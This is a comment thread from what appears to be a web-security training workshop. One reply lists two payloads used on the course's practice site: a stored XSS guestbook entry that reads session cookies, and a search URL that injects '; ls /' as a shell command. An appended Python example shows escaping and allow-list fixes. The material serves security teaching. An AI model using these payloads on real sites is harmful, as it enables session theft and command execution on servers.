Hacking Sites for Fun and Profit

Comments


Anonymous at 11:09 on 9 May 2015

Great course!

There was so much thought put into this workshop. Thank you!

The example VM was extremely helpful in allowing us to inspect bad practices and possible vulnerabilities.

Hi David,

Really enjoyed your class. Hey, during the class itself you were keeping track of all the hacks we found for your Cheese site. Can you provide that document to me or direct me where I can get it? I was showing this information to some co-workers and couldn't remember all the hacks we did on the Search box.

Thanks,

John Kallen

@John Kallen: I think this is what you are looking for:

XSS in guestbook:

Enter this as a guestbook entry:

Nothing to see here....
<script type='text/javascript'>alert('pwned your sessionID is '+document.cookie.substring(11));</script>

Command injection in search:
http://hackingsite.dev/cheese/search?q=cheez-it;%20ls%20/
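Added here as an illustration of the fixes for the two hacks listed above; this is example code and not the course's Cheese site. The function names, the allow-list pattern and the catalogue path are assumptions, and the two payloads are reconstructed from the comment.

```python
import html
import re
from typing import List

# Constructed from the comment above: the guestbook entry and the decoded search query.
GUESTBOOK_PAYLOAD = ("Nothing to see here....<script type='text/javascript'>"
                     "alert('pwned your sessionID is '+document.cookie.substring(11));</script>")
SEARCH_PAYLOAD = "cheez-it; ls /"          # URL-decoded form of q=cheez-it;%20ls%20/

# Hypothetical location of the cheese catalogue the search greps through.
CATALOGUE_PATH = "/var/www/cheese/catalogue.txt"


def render_guestbook_entry(entry: str) -> str:
    """Fix for the stored XSS: encode the entry before it goes into the page.

    html.escape() turns < > & " ' into entities, so the browser renders the
    script tag as literal text instead of executing it.
    """
    return "<li>" + html.escape(entry, quote=True) + "</li>"


def unsafe_shell_line(q: str) -> str:
    """The injectable pattern: the query is pasted into a command string that a
    shell will parse. Returned, not executed, so the problem is visible."""
    return "grep -i " + q + " " + CATALOGUE_PATH


def shell_commands(line: str) -> List[str]:
    """Show how the shell would read unsafe_shell_line(): ';' ends one command
    and starts another, so 'ls /' runs as a second command."""
    return [part.strip() for part in line.split(";")]


# Allow-list for a cheese name: letters, digits, space, dot, apostrophe, hyphen.
CHEESE_QUERY = re.compile(r"[A-Za-z0-9 .'-]{1,40}")


def is_allowed_query(q: str) -> bool:
    """True only if the whole query matches the allow-list (no ; | & / etc.)."""
    return CHEESE_QUERY.fullmatch(q) is not None


def safe_search_argv(q: str) -> List[str]:
    """Fix for the command injection: validate the query, then build an argv
    list for subprocess.run(argv) so no shell ever parses the user input.
    Raises ValueError instead of running anything for a rejected query."""
    if not is_allowed_query(q):
        raise ValueError("search query contains characters outside the allow-list")
    # '--' stops grep treating a query starting with '-' as an option.
    return ["grep", "-i", "--", q, CATALOGUE_PATH]
```

Pass the returned list to `subprocess.run(argv, ...)` without `shell=True`; the query is always a single argument to grep, whatever it contains.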